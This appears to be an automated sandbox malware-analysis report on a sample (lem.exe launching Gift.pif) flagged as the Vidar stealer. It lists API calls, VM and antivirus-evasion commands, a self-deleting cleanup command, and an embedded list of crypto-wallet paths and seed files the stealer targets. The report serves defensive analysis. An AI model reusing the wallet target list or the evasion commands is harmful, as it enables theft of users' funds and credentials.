                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\CBKJJJDHDGDA\GDAAKKJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\CBKJJJDHDGDA\GDAAKKJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_003559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_003559B3
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002E5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_002E5EDA
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_002F33B7
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Found stalling execution ending in API Sleep call
                        Source: C:\Users\user\Desktop\lem.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifDropped PE file which has not been started: C:\ProgramData\CBKJJJDHDGDA\GDAAKKJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_11-100353
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifAPI coverage: 4.3 %
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 4024Thread sleep count: 42 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 1100Thread sleep count: 49 > 30Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00334005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00334005
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0033494A
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0033C2FF
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033CD14 FindFirstFileW,FindClose,11_2_0033CD14
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0033CD9F
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0033F5D8
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0033F735
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0033FA36
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00333CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00333CE2
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002E5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_002E5D13
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: Gift.pif, 0000000B.00000002.3217284098.000000000161C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareOe
                        Source: Gift.pif, 0000000B.00000002.3217284098.000000000161C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000046D2000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217461443.000000000174F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Gift.pif, 0000000B.00000002.3217806128.00000000046D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifAPI call chain: ExitProcess graph end nodegraph_11-98942
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifAPI call chain: ExitProcess graph end nodegraph_11-100085
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_003445D5 BlockInput,11_2_003445D5
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002E5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_002E5240
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00305CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00305CAC
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_003288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_003288CD
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002FA354 SetUnhandledExceptionFilter,11_2_002FA354
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002FA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_002FA385
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifMemory protected: page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: Process Memory Space: Gift.pif PID: 748, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00329369 LogonUserW,11_2_00329369
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002E5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_002E5240
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00331AC6 SendInput,keybd_event,11_2_00331AC6
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_003351E2 mouse_event,11_2_003351E2
                        Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 366791Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TrailersTractOffersVenezuela" Mines Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\366791\Gift.pif 366791\Gift.pif 366791\MJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_003288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_003288CD
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00334F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00334F1C
                        Source: lem.exe, 00000000.00000003.2038093775.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp, Residents.0.dr, Gift.pif.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                        Source: Gift.pifBinary or memory string: Shell_TrayWnd
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F885B cpuid 11_2_002F885B
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00310030 GetLocalTime,__swprintf,11_2_00310030
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00310722 GetUserNameW,11_2_00310722
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0030416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_0030416A
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 11.3.Gift.pif.4688da0.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.1722008.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.16a2810.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.465b598.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.465b598.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.46e0000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.4688da0.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.4688da0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.4688da0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.1722008.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2545299732.0000000004688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Gift.pif PID: 748, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
